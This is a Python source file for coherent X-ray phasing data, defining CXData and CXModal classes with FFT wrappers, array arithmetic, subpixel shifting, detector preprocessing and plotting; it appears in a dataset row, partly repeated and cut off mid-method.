l.append(self.shift(data[xstart // 1:xstop // 1, ystart //1: ystop //1], dx, dy))
return CXData(data=l)
def __setitem__(self, s, arr):
"""
Embed a smaller array in a larger array.
a[s] = arr
"""
if isinstance(s, int):
if len(arr)>1:
raise Exception('Cannot set single array with list of arrays.')
self.data[s]=arr.data[0]
else:
y, x = s
xstart = x.start or 0
xstop = x.stop or self.data[0].shape[0]-1
ystart = y.start or 0
ystop = y.stop or self.data[0].shape[1]-1
dx, dy = np.mod(xstart, 1), np.mod(ystart, 1)
l=[]
if isinstance(arr, CXData):
for i, data in enumerate(self.data):
l.append(data.copy())
l[i][xstart // 1:xstop // 1, ystart //1: ystop //1] = self.shift(arr.data[i], dx, dy)
self.data = l
elif isinstance(arr, np.ndarray):
for i, data in enumerate(self.data):
l.append(data.copy())
l[i][xstart // 1:xstop // 1, ystart //1:ystop //1] = self.shift(arr, dx, dy)
self.data = l
elif isinstance(arr, (int, float)):
for i, data in enumerate(self.data):
l.append(data.copy())
l[i][xstart // 1:xstop // 1, ystart //1: ystop //1] = arr
l[i] = self.shift(l[i], dx, dy)
self.data = l
@staticmethod
def inner_product(u, v):
return sp.sum((conj(u)*v).data[0])/(u.data[0].shape[0]*u.data[0].shape[1])
@staticmethod
def proj_u_v(u, v):
return u*(CXData.inner_product(v, u)/CXData.inner_product(u, u))
def max(self):
"""
Return a list of maximum (absolute) value(s) of (complex) array(s).
"""
if len(self.data)==1:
return abs(self.data[0]).max()
else:
return [abs(element).max() for element in self.data]
def min(self):
"""
Return a list of minimum (absolute) value(s) of (complex) array(s).
"""
if len(self.data)==1:
return abs(self.data[0]).min()
else:
return [abs(element).min() for element in self.data]
def normalise(self, val=1.):
"""
Rebase data from 0 to 1.
"""
if CXP.reconstruction.verbose:
CXP.log.info('Rebasing data from 0 to {:3.2f}'.format(val))
for i in xrange(len(self.data)):
self.data[i] -= abs(self.data[i]).min()
self.data[i] /= abs(self.data[i]).max()
self.data[i] *= val
def append(self, other):
if isinstance(other, CXData):
for data in other.data:
self.data.append(data)
elif isinstance(other, np.ndarray):
self.data.append(other)
def square_root(self):
if CXP.reconstruction.verbose:
CXP.log.info('Taking square root.')
for i in xrange(len(self.data)):
self.data[i] = pow(self.data[i], 0.5)
def fft_shift(self):
if CXP.reconstruction.verbose:
CXP.log.info('Performing FFT shift.')
for i in xrange(len(self.data)):
self.data[i] = spf.fftshift(self.data[i])
def len(self):
return len(self.data)
@staticmethod
def shift_inner(arr, nx, ny, window=False, padding='reflect'):
"""
Shifts an array by nx and ny respectively.
"""
if ((nx % 1. == 0.) and (ny % 1. ==0)):
return sp.roll(sp.roll(arr, int(ny), axis=0),
int(nx), axis=1)
else:
atype = arr.dtype
if padding:
x, y = arr.shape
pwx, pwy = int(pow(2., np.ceil(np.log2(1.5*arr.shape[0])))), int(pow(2., np.ceil(np.log2(1.5*arr.shape[1]))))
pwx2, pwy2 = (pwx-x)/2, (pwy-y)/2
if pad=='zero':
arr = pad.with_constant(arr, pad_width=((pwx2, pwx2), (pwy2, pwy2)))
else:
arr = pad.with_reflect(arr, pad_width=((pwx2, pwx2), (pwy2, pwy2)))
phaseFactor = sp.exp(complex(0., -2.*sp.pi)*(ny*spf.fftfreq(arr.shape[0])[:, np.newaxis]+nx*spf.fftfreq(arr.shape[1])[np.newaxis, :]))
if window:
window = spf.fftshift(CXData._tukeywin(arr.shape[0], alpha=0.35))
arr = spf.ifft2(spf.fft2(arr)*phaseFactor*window)
else:
arr = spf.ifft2(spf.fft2(arr)*phaseFactor)
if padding:
arr = arr[pwx/4:3*pwx/4, pwy/4:3*pwy/4]
if atype == 'complex':
return arr
else:
return np.real(arr)
@staticmethod
def shift(x, nx, ny, **kwargs):
if isinstance(x, CXData):
l=[]
for data in x.data:
l.append(CXData.shift_inner(data.copy(), nx, ny, **kwargs))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return CXData.shift_inner(x, nx, ny)
def ishift(self, nx, ny, **kwargs):
# Inplace version of shift
l=[]
for data in self.data:
for data in self.data:
l.append(self.shift_inner(data.copy(), nx, ny, kwargs))
self.data = l
return self
def rot90(self, i):
# Rotate by 90 degrees i times
if CXP.reconstruction.verbose:
CXP.log.info('Rotating data by {:d}'.format(i*90))
for j, data in enumerate(self.data):
self.data[j] = sp.rot90(data, i)
def find_dead_pixels(self):
# Return coordinates of pixels with a standard deviation of zero
dead_pix = sp.where(abs(np.std(self.data, axis=0))<machine_precision)
if CXP.reconstruction.verbose:
CXP.log.info('Found {0:d} dead pixels'.format(len(dead_pix)))
return dead_pix
def zero_dead_pixels(self):
if CXP.reconstruction.verbose:
CXP.log.info('Setting dead pixels to zero')
self.data[self.find_dead_pixels()]=0.
def threshhold(self, threshhold=None):
if not threshhold:
threshhold = CXP.preprocessing.threshhold_raw_data
if CXP.reconstruction.verbose:
CXP.log.info('Applying threshhold to data at {:3.2f} and rebasing to 0.'.format(threshhold))
for i, data in enumerate(self.data):
tdata = sp.where(data<threshhold, threshhold, data)
tdata-=tdata.min()
self.data[i]=tdata
def symmetrize_array_shape(self, qxqy0=None, desired_shape=None):
x0, y0 = self.data[0].shape
if desired_shape is None:
desired_shape = CXP.preprocessing.desired_array_shape
if qxqy0 is None:
qx, qy = CXP.preprocessing.qx0qy0
else:
qx, qy = qxqy0
if CXP.reconstruction.verbose:
CXP.log.info('Symmetrizing array shape.\n\tCurrent shape:\t{}x{}\n\tNew shape:\t{}x{}\n\tCentred on:\t{},{}'.format(
x0, y0, desired_shape, desired_shape, qx, qy))
# Cropping or padding?
qx_lower, qx_upper = qx-desired_shape/2, qx+desired_shape/2
qy_lower, qy_upper = qy-desired_shape/2, qy+desired_shape/2
if qx_lower<0: # Crop
nxl, mxl = np.abs(qx_lower), 0
else: # Pad
nxl, mxl = 0, qx_lower
if qy_lower<0: # Crop
nyl, myl = np.abs(qy_lower), 0
else: # Pad
nyl, myl = 0, qy_lower
if qx_upper<x0: # Crop
nxu, mxu = desired_shape, qx+desired_shape/2
else: # Pad
nxu, mxu = x0-qx_lower, x0
if qy_upper<y0: # Crop
nyu, myu = desired_shape, qy+desired_shape/2
else: # Pad
nyu, myu = y0-qy_lower, y0
for i in range(len(self.data)):
tmp = sp.zeros((desired_shape, desired_shape))
tmp[nxl:nxu, nyl:nyu] = self.data[i][mxl:mxu, myl:myu]
self.data[i] = tmp
CXP.p = CXP.preprocessing.desired_array_shape
def treat_beamstop(self):
factor = CXP.measurement.beam_stop_factor.keys()[0]
x0, y0 = CXP.measurement.beam_stop_factor[factor][0]
x1, y1 = CXP.measurement.beam_stop_factor[factor][1]
for i in range(len(self.data)):
self.data[i][x0:x1, y0:y1]*=factor
def save(self, path=None):
if path:
filepath = path
else:
filepath = self.savepath
try:
CXP.log.info('Saving {} to:\n\t{}'.format(self.name, filepath))
except AttributeError:
CXP.log.info('Saving to:\n\t{}'.format(filepath))
try:
np.savez(filepath, *self.data)
except IOError as e:
CXP.log.error(e)
raise Exception('Could not save {} to {}'.format(self.kwargs['name'], path))
def load(self, path=None):
if path:
filepath = path
else:
filepath = self.filename
CXP.log.info('Loading data from:\n\t{}'.format(filepath))
try:
self.data = self.openup(filepath)
except IOError as e:
CXP.log.error(e)
raise Exception('Could not load file from {}'.format(filepath))
if not isinstance(self.data, list):
self.data = [self.data]
def init_data(self, *args, **kwargs):
if args[0] == 'det_mod':
if CXP.actions.preprocess_data:
self.read_in_data()
else:
self.load()
elif args[0] == 'probe_det_mod':
if CXP.actions.preprocess_data:
# Get list of white files
CXP.log.info('Preprocessing probe detector modulus.')
if CXP.io.whitefield_filename not in [None, '']: # If whitefields were measured
wfilename, wfilerange, wn_acqs = [CXP.io.whitefield_filename, CXP.io.whitefield_filename_range,
CXP.measurement.n_acqs_whitefield]
self.pattern = wfilename.count('{')
if self.pattern == 1:
wf = [wfilename.format(i) for i in range(wfilerange[0], wfilerange[1])]
elif self.pattern == 2:
wf = [wfilename.format(wfilerange[0], i) for i in range(wn_acqs)]
elif self.pattern == 3:
wf = glob.glob(wfilename.split('}')[0]+'}*')
res = self.preprocess_data_stack(0, 1, wf, self.pattern, None, None, no_decorate=True)
self.data = res[1]
else: #Guesstimate the whitefield from the average of the diffraction patterns
pass
else:
self.load(CXData.raw_data_filename_string.format('probe_det_mod'))
try:
probe = self.__class__.__all__['probe']
probe.data[0] = spf.ifft2(self.data[0]*exp(complex(0., 1.)*sp.angle(spf.fft2(probe.data[0]))))
CXP.log.info('Applied probe modulus constraint.')
except (AttributeError, KeyError):
pass
elif args[0] == 'dark':
if CXP.actions.preprocess_data:
# Get list of dark files
CXP.log.info('Preprocessing darkfield.')
dfilename, dfilerange, dn_acqs = [CXP.io.darkfield_filename, CXP.io.darkfield_filename_range,
CXP.measurement.n_acqs_darkfield]
self.pattern = dfilename.count('{')
if self.pattern == 1:
df = [dfilename.format(i) for i in range(dfilerange[0], dfilerange[1])]
elif self.pattern == 2:
df = [dfilename.format(dfilerange[0], i) for i in range(dn_acqs)]
elif self.pattern == 3:
df = glob.glob(dfilename.split('}')[0]+'}*')
res = self.preprocess_data_stack(0, 1, df, self.pattern, None, None, no_decorate=True)
self.data = res[1]
else:
self.load(CXData.raw_data_filename_string.format('probe_det_mod'))
def read_in_data(self):
self.completed_filenames = [] # Keep track of what's been processed already for online analysis
self.job_filenames = [] # Bundle stack of images for preprocessing
self.pattern = None
# Determine which files to read in
CXP.log.info('Reading in & preprocessing raw data...')
#Pattern 1: 'image_{:d}.xxx'
#Pattern 2: 'image_{:d}_{:d}.xxx'
#Pattern 3: 'image_{:d}_{:d}_{val}.xxx'
if self.pattern is None: # Pattern is not yet dertermined
filename, filerange, n_acqs = [CXP.io.data_filename, CXP.io.data_filename_range, CXP.measurement.n_acqs_data]
self.pattern = filename.count('{')
CXP.log.info('Detected filename pattern: {:d}'.format(self.pattern))
if self.pattern == 0:
raise Exception('NamingConventionError:\nPlease read CXParams for more info on file naming conventions.')
try:
n0, n1 = filerange[0], filerange[1]+1
except IndexError:
n0 = n1 = filerange[0]
if CXP.io.darkfield_filename is not '': # dark
try:
dark = self.__class__.__all__['dark']
CXP.log.info('Found darkfield.')
except KeyError:
dark = CXData(itype='dark')
dark.save()
else:
CXP.log.info('Not processing darkfields.')
dark = None
if CXP.io.whitefield_filename is not '': # white
try:
probe_det_mod = self.__class__.__all__['probe_det_mod']
CXP.log.info('Found probe detector modulus.')
except KeyError:
probe_det_mod = CXData(itype='probe_det_mod')
probe_det_mod.save()
else:
CXP.log.info('Not processing whitefields.')
probe_det_mod = None
old_verbosity = CXP.reconstruction.verbose
CXP.reconstruction.verbose = False
jobs = mp.JoinableQueue()
results = mp.Queue()
n_processes = mp.cpu_count()
then = time.time()
cnt=0
missing_frames = False
l=[]
CXP.log.info('Dividing raw data into jobs over {:d} processes.'.format(n_processes))
for i in range(n0, n1):
if self.pattern == 1:
s = [filename.format(i)]
else:
s = glob.glob((filename.split('}')[0]+'}*').format(i))
# Include only files that haven't been processed yet
# s = [fn for fn in s if fn not in self.completed_filenames]
if len(s)==0:
CXP.log.error('Globbed 0 files in CXData@read_in_files')
sys.exit(1)
if self.pattern==1:
try:
s=s[0]
self.completed_filenames.append(s)
if cnt<n_acqs:
l.append(s)
cnt+=1
if cnt>=n_acqs:
self.job_filenames.append(l)
cnt=0
l=[]
except IndexError:
missing_frames = True
CXP.log.error('Missing frame: {:s}'.format(filename.format(i)))
else:
self.completed_filenames+=s
self.job_filenames.append(s)
if missing_frames:
print "There were missing frames. Choose 'c' to continue or 'q' to quit."
pdb.set_trace()
p = [mp.Process(target=self.preprocess_data_stack, args=(jobs, results))
for i in range(n_processes)]
for process in p:
process.start()
n_jobs = len(self.job_filenames)
for i in range(n_jobs):
jobs.put((i, n_jobs, self.job_filenames[i], self.pattern, probe_det_mod, dark))
# Add Poison Pill
for i in range(n_processes):
jobs.put((None, None, None, None, None, None))
CXP.log.info('{:3.2f} seconds elapsed dividing jobs between processes.'.format(time.time()-then))
then = time.time()
cnt = 0
self.data = [None]*n_jobs
while True:
if not results.empty():
i, data = results.get()
self.data[i] = data[0]
cnt+=1
elif cnt==n_jobs:
break
jobs.join()
jobs.close()
results.close()
for process in p:
process.join()
CXP.log.info('{:3.2f} seconds elapsed preprocessing data.'.format(time.time()-then))
CXP.reconstruction.verbose = old_verbosity
#self._sequence_dir = '/'.join([CXP.io.base_dir, CXP.io.scan_id, 'sequences'])
#self._cur_sequence_dir = self._sequence_dir+'/sequence_{:d}'.format(CXP.reconstruction.sequence)
#self.save(path=self._cur_sequence_dir+'/det_mod.npy')
@worker
def preprocess_data_stack(self, stack_num, n_jobs, file_list, pattern, white, dark):
# Average, merge and preprocess a stack of images
# Typically a stack corresponds to one ptychographic position
l=[]
tmp=None
# First - average according to the pattern
if pattern in [1, 2]:
# Averaging only
for filename in file_list:
if tmp is None:
tmp = self.openup(filename)
else:
tmp += self.openup(filename)
l.append(tmp/len(file_list))
elif pattern == 3:
# Average then merge
d={}
unique_times = list(set([t.split('_')[3] for t in file_list]))
for filename in file_list:
t = filename.split('.')[0].split('_')[-1]
if t not in d.keys():
d[t] = (1, self.openup(filename))
else:
d[t][0] += 1
d[t][1] += self.openup(filename)
for key, (i, val) in d.iteritems():
val /= i
# Check for saturated values and merge variable exposure times
max_time = max(unique_times)
if CXP.preprocessing.saturation_level>0:
for key in d.keys():
wh = sp.where(d[key]>=CXP.preprocessing.saturation_level)
d[key][wh] = 0
if tmp == 0:
tmp = d[key] * max_time/float(key)
else:
tmp += d[key] * max_time/float(key)
l.append(tmp)
else:
raise Exception('NamingConventionError')
# Do preprocessing
data = CXData()
data.data = l
if CXP.measurement.beam_stop:
data.treat_beamstop()
data.symmetrize_array_shape()
# CCD Specific Preprocessing
if CXP.preprocessing.detector_type == 'ccd':
try:
# Dark field correction
if dark is not None:
print('Dark field correcting data')
data-=dark
# Dark correct white field
if white is not None:
print('Dark field correcting whitefield')
white-=dark
except UnboundLocalError:
print('No darkfield subtraction performed.')
# PAD Specific Preprocessing
elif CXP.preprocessing.detector_type == 'pad':
pass
# Threshhold data
if CXP.preprocessing.threshhold_raw_data > 0:
data.threshhold()
if white is not None:
white.threshhold()
# Bin data
if CXP.preprocessing.bin > 1:
data.bin()
if white is not None:
white.bin()
if CXP.preprocessing.rot90!=0:
data.rot90(CXP.preprocessing.rot90)
if white is not None:
white.rot90(CXP.preprocessing.rot90)
# Take square root
data.square_root()
if white is not None:
white.square_root()
# Put in FFT shifted
data.fft_shift()
if white is not None:
white.fft_shift()
return (stack_num, data.data)
def bin(self, n=None):
"""
Bin a square array by grouping nxn pixels.
Array size must be a multiple of n.
"""
if n is None:
n=CXP.preprocessing.bin
# Now the detector pixel size has changed so we should update that
CXP.experiment.dx_d *= n
CXP.log.info('After binning new detector pixel size: {2.2e}'.format(CXP.experiment.dx_d))
nx, ny = self.data[0].shape[0], self.data[0].shape[1]
if not nx==ny:
raise Exception('Array to be binned must be square')
if not sp.mod(nx, n)==0.:
raise Exception('Array size must be a multiple of binning factor')
if n>nx:
raise Exception('Binning factor must be smaller than array size')
nn = nx/n
l = []
for i in xrange(len(self.data)):
tmp = sp.zeros((nn, nn))
for p in xrange(nn):
for q in xrange(nn):
tmp[p, q] = sp.sum(self.data[i][p*n:(p+1)*n, q*n:(q+1)*n])
l.append(tmp)
self.data=l
def show(self, i=0, phase=False, log=False):
if phase:
pylab.matshow(angle(self.data[i]), cmap=cm.hsv)
else:
if log:
pylab.matshow(sp.log10(abs(self.data[i])))
else:
pylab.matshow(abs(self.data[i]))
pylab.colorbar()
pylab.show()
def plot(self, i=0, phase=False):
pylab.figure()
if phase:
pylab.plot(np.angle(self.data[i][:, self.data[i].shape[0]/2]), label='Horizontal')
pylab.plot(np.angle(self.data[i][self.data[i].shape[1]/2, :]), label='Vertical')
else:
pylab.plot(np.abs(self.data[i][:, self.data[i].shape[0]/2]), label='Horizontal')
pylab.plot(np.abs(self.data[i][self.data[i].shape[1]/2, :]), label='Vertical')
pylab.legend()
def copy(self):
return CXData(data=[np.copy(arr) for arr in self.data])
class CXModal(object):
def __init__(self, *args, **kwargs):
self.modes = []
self.savepath = None
for kw in kwargs:
# Data attribute must be a list of arrays
if kw=='modes':
if isinstance(kwargs['modes'], list):
self.modes = kwargs['modes']
elif isinstance(kwargs['modes'], CXData):
self.modes = [kwargs['modes']]
else:
setattr(self, kw, kwargs[kw])
def __repr__(self):
try:
s=repr(self.modes[0].data[0])
except:
s=''
try:
return '<{} at {}>\n{:d} modes containing {:d} arrays ({:d}x{:d}px).\n{}'.format(self.__class__,
hex(id(self)), len(self.modes), len(self.modes[0]), self.modes[0].data[0].shape[0],
self.modes[0].data[0].shape[1], s)
except AttributeError:
return '<{} at {}>\nNo modes attribute present.'.format(self.__class__, hex(id(self)))
def __getitem__(self, s):
return self.modes[s]
def __setitem__(self, s, modes):
self.modes[s] = modes
@staticmethod
def _addsubmuldiv(operation, this, other):
if isinstance(other, CXModal):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other.modes[mode].data[i]) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
elif isinstance(other, CXData):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other.data[i]) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
elif isinstance(other, (int, float, complex)):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
@staticmethod
def _iaddsubmuldiv(operation, this, other):
if isinstance(other, CXModal):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i]=operation(this.modes[mode].data[i], other.modes[mode].data[i])
return this
elif isinstance(other, CXData):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i] = operation(this.modes[mode].data[i], other.data[i])
return this
elif isinstance(other, (int, float, complex)):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i] = operation(this.modes[mode].data[i], other)
return this
def __add__(self, other):
return CXModal._addsubmuldiv(operator.add, self, other)
def __radd__(self, other):
return CXModal._addsubmuldiv(operator.add, self, other)
def __iadd__(self, other):
return CXModal._iaddsubmuldiv(operator.iadd, self, other)
def __sub__(self, other):
return CXModal._addsubmuldiv(operator.sub, self, other)
def __rsub__(self, other):
return CXModal._addsubmuldiv(operator.sub, other, self)
def __isub__(self, other):
return CXModal._iaddsubmuldiv(operator.isub, self, other)
def __mul__(self, other):
return CXModal._addsubmuldiv(operator.mul, self, other)
def __rmul__(self, other):
return CXModal._addsubmuldiv(operator.mul, self, other)
def __imul__(self, other):
return CXModal._addsubmuldiv(operator.imul, self, other)
def __div__(self, other):
return CXModal._addsubmuldiv(operator.div, self, other)
def __rdiv__(self, other):
return CXModal._addsubmuldiv(operator.div, self, other)
def __idiv__(self, other):
return CXModal._addsubmuldiv(operator.idiv, self, other)
def __pow__(self, power):
return CXModal(modes=[self.modes[mode]**power for mode in range(len(self.modes))])
def __len__(self):
return len(self.modes)
def copy(self):
return CXModal(modes=[self.modes[mode].copy() for mode in range(len(self))])
@staticmethod
def modal_sum(modal):
return CXData(data=[ reduce(CXData.__add__, [ modal[mode][i] for mode in range(len(modal.modes)) ]).data[0] for i in range(len(modal[0].data))])
def getat(self, i):
"""
.. method::setat(self, i)
return all modes at position i
"""
return CXModal(modes=[self.modes[mode][i] for mode in range(len(self))])
def setat(self, i, modal):
"""
.. method::getat(self, i)
set all modes at position i
"""
for mode in range(len(self)):
self.modes[mode][i] = modal.modes[mode][0]
def normalise(self):
mode_sum_max = CXModal.modal_sum(abs(self)).data[0].max()
for mode in range(len(self)):
self.modes[mode] /= mode_sum_max
def orthogonalise(self):
ortho = CXModal(modes=self[0][0].copy())
for i in range(1, len(self)):
tmp = self[i][0].copy()
for j in range(i-1, -1, -1):
tmp -= CXData.proj_u_v(ortho[j][0], self[i][0])
ortho.modes.append(tmp)
return CXModal(modes=ortho.modes) | 33.571193 | 152 | 0.539312 | """
.. module:: CXData2.py
:platform: Unix
:synopsis: A class for coherent X-ray phasing data.
.. moduleauthor:: David Vine <djvine@gmail.com>
"""
import scipy as sp
import numpy as np
import scipy.fftpack as spf
import scipy.ndimage as spn
from numpy.random import uniform
from numpy import pad
import os
import pdb
import pylab
import shutil
import sys
import operator
from round_scan import round_roi
import glob
import multiprocessing as mp
import time
from matplotlib import cm
from images2gif import writeGif
from CXFileReader import CXFileReader
from cxparams import CXParams as CXP
debug = True
def fft2(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(spf.fft2(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(fft2(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return spf.fft2(x)
else:
raise Exception('Unknown data type passed to fft2')
def ifft2(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(spf.ifft2(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(ifft2(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return spf.ifft2(x)
else:
raise Exception('Unknown data type passed to ifft2')
def fftshift(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(spf.fftshift(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return spf.fftshift(x)
else:
raise Exception('Unknown data type passed to fftshift')
def abs(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(np.abs(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(abs(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return np.abs(x)
else:
raise Exception('Unknown data type passed to abs')
def angle(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.angle(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return sp.angle(x)
else:
raise Exception('Unknown data type passed to angle')
def exp(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.exp(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return sp.exp(x)
else:
raise Exception('Unknown data type passed to exp')
def log(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.log(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return sp.log(x)
else:
raise Exception('Unknown data type passed to log')
def conj(x):
"""
Wrapper for conjugate on a CXData object.
"""
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.conj(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(conj(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return sp.conj(x)
else:
raise Exception('Unknown data type passed to conj')
def sqrt(x):
"""
Wrapper for square root on a CXData object.
"""
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.sqrt(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(exp(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, (int, float, complex, np.ndarray)):
return sp.sqrt(x)
else:
raise Exception('Unknown data type passed to sqrt')
def sum(x):
"""
Sum over arrays.
"""
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
if i==0:
l.append(x.data[0])
else:
l[0] += x.data[i]
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(self.modes)):
l.append(sum(self.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return sp.sum(x)
else:
raise Exception('Unknown data type pass to sum')
def worker(func):
def worker2(self=None, *args, **kwargs):
try:
kwargs['no_decorate']
return func(self, args[0], args[1], args[2], args[3], args[4], args[5])
except KeyError:
cnt = 0
jobs, results = args[0], args[1]
while True:
job_args = jobs.get()
if job_args[0]==None:
print '{}: Exiting. {:d} jobs completed.'.format(mp.current_process().name, cnt)
jobs.task_done()
break
if job_args[0]%np.floor(job_args[1]/10)==0:
print 'Processed {:d} out of {:d} files.'.format(job_args[0], job_args[1])
res = func(self, *job_args)
cnt+=1
jobs.task_done()
results.put(res)
return worker2
return worker2
class CXData(CXFileReader):
"""
Defines a class for holding and interacting with coherent x-ray data.
...
Attributes
----------
data: list
list of complex arrays that hold all of the phase retrieval data.
name: str
name of instance. Used for logging.
savepath: str
location where this data should be saved.
Methods
-------
"""
def __init__(self, *args, **kwargs):
self.data = None
self.savepath = None
for kw in kwargs:
if kw=='data':
if isinstance(kwargs['data'], list):
self.data = kwargs['data']
elif isinstance(kwargs['data'], np.ndarray):
self.data = [kwargs['data']]
else:
setattr(self, kw, kwargs[kw])
def __repr__(self):
try:
s=repr(self.data[0])
except:
s=''
try:
return '<{} at {}>\n{} arrays ({:d}x{:d}px).\n{}'.format(self.__class__,
hex(id(self)), len(self.data), self.data[0].shape[0], self.data[0].shape[1], s)
except AttributeError:
return '<{} at {}>\nNo data attribute present.'.format(self.__class__, hex(id(self)))
def __add__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]+other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]+other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__add__(other, self)
def __iadd__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]+=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]+=other
return self
elif isinstance(other, CXModal):
raise("The meaning of += is ambiguous for these datatypes")
def __sub__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]-other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]-other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__sub__(other, self)*-1.0
def __isub__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]-=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]-=other.data
return self
elif isinstance(other, CXModal):
raise("The meaning of -= is ambiguous for these datatypes")
def __pow__(self, power):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]**power)
return CXData(data=l)
def __mul__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]*other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]*other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__mul__(other, self)
def __rmul__(self, other):
return self.__mul__(other)
def __imul__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]*=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]*=other
return self
elif isinstance(other, CXModal):
raise("The meaning of *= is ambiguous for these datatypes")
def __div__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]/other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]/other)
return CXData(data=l)
elif isinstance(other, CXModal):
raise("The meaning of / is ambiguous for these datatypes")
def __rdiv__(self, other):
return self.__mul__(other)
def __idiv__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]/=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]/=other
return self
elif isinstance(other, CXModal):
raise("The meaning of /= is ambiguous for these datatypes")
def __len__(self):
return len(self.data)
def __del__(self):
try:
print 'Deleting {}'.format(self.kwargs['itype'])
CXData.__all__.pop(self.kwargs['itype'])
except (AttributeError, KeyError):
pass
def __getitem__(self, s):
"""
Allows extracting a subarray from self.data or a single array from a list of arrays.
Implements subpixel shifting for seamless indexing of a fractional number of pixels.
The returned array must be an integer number of pixels.
E.g a[0:100.6] doesn't make any sense
but a[0.6:100.6] does.
a[0] is equivalent to a.data[0]
"""
if isinstance(s, int):
return CXData(data=self.data[s])
else:
y, x = s
xstart = x.start or 0
xstop = x.stop or self.data[0].shape[0]-1
ystart = y.start or 0
ystop = y.stop or self.data[0].shape[1]-1
dx, dy = -np.mod(xstart, 1), -np.mod(ystart, 1)
l = []
for data in self.data:
l.append(self.shift(data[xstart // 1:xstop // 1, ystart //1: ystop //1], dx, dy))
return CXData(data=l)
def __setitem__(self, s, arr):
"""
Embed a smaller array in a larger array.
a[s] = arr
"""
if isinstance(s, int):
if len(arr)>1:
raise Exception('Cannot set single array with list of arrays.')
self.data[s]=arr.data[0]
else:
y, x = s
xstart = x.start or 0
xstop = x.stop or self.data[0].shape[0]-1
ystart = y.start or 0
ystop = y.stop or self.data[0].shape[1]-1
dx, dy = np.mod(xstart, 1), np.mod(ystart, 1)
l=[]
if isinstance(arr, CXData):
for i, data in enumerate(self.data):
l.append(data.copy())
l[i][xstart // 1:xstop // 1, ystart //1: ystop //1] = self.shift(arr.data[i], dx, dy)
self.data = l
elif isinstance(arr, np.ndarray):
for i, data in enumerate(self.data):
l.append(data.copy())
l[i][xstart // 1:xstop // 1, ystart //1:ystop //1] = self.shift(arr, dx, dy)
self.data = l
elif isinstance(arr, (int, float)):
for i, data in enumerate(self.data):
l.append(data.copy())
